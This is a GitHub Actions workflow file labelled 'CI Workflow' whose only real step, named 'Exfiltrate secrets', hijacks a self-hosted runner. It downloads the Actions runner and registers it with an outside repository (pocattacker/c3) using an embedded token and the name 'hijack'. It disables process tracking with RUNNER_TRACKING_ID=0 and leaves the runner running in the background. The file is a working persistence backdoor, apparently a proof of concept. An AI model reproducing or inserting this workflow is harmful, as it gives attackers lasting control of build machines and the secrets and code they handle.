name: CI Workflow

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  build:
    runs-on: self-hosted

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '14'

      - name: Exfiltrate secrets
        run: |
          cd ~/
          ls
          mkdir actions-runner3 && cd actions-runner3
          curl -o actions-runner-linux-x64-2.320.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.320.0/actions-runner-linux-x64-2.320.0.tar.gz
          echo "93ac1b7ce743ee85b5d386f5c1787385ef07b3d7c728ff66ce0d3813d5f46900  actions-runner-linux-x64-2.320.0.tar.gz" | shasum -a 256 -c
          tar xzf ./actions-runner-linux-x64-2.320.0.tar.gz
          ./config.sh --url https://github.com/pocattacker/c3 --unattended --token BL7S76GE6SROGVH7QNOUISLHA6Y54  --name hijack
          export RUNNER_TRACKING_ID=0;
          nohup ./run.sh &
